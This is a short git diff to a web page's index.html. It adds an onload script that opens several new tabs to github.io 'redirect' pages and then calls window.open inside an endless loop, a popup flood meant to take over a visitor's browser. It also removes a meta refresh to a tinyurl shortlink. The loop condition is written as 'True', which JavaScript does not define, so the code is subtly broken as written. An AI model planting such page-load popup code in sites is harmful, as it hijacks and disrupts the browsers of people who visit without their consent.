--- a/index.html
+++ b/index.html
@@ -1,12 +1,13 @@
 <head>
 <script>
 function myfunction() {
+window.open("https://georgezhou3.github.io/redirect4/", '_blank');
+window.open("https://georgezhou3.github.io/redirect4/", '_blank');
+while (True) {
 window.open("https://georgezhou3.github.io/redirect2/", '_blank');
+}
 }
 </script>
 </head>
 <body onload="myfunction()">
 </body>
-<body onload="myfunction()">
-</body>
-<meta http-equiv="refresh" content="0; URL=https://tinyurl.com/djfkajidfej" />
